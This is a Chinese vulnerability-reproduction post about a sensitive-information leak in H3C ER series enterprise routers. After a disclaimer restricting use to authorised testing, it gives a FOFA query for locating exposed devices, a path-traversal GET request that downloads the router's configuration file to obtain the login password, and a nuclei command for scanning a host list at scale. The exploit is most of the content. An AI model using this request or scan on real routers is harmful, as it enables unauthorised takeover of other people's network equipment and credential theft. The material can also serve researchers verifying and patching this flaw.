漏洞复现 H3C ER系列路由器存在敏感信息泄露

0x01 阅读须知

融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

0x02 漏洞描述

H3C ER是新华三技术有限公司面向中小企业用户推出的全新一代高性能企业级路由器，H3C ER系列路由器存在敏感信息泄露。

0x03 漏洞复现

fofa-qeury: title="ER2200G2"

1.执行poc，得到密码，登录即可(可根据型号修改对应的.cfg，例如ER2200G2.cfg)

GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1Host: User-Agent: Mozilla/5.0

2.nuclei验证脚本已发表于知识星球

nuclei.exe -t h3c-router-userlogin-infoleak.yaml -l subs.txt -stats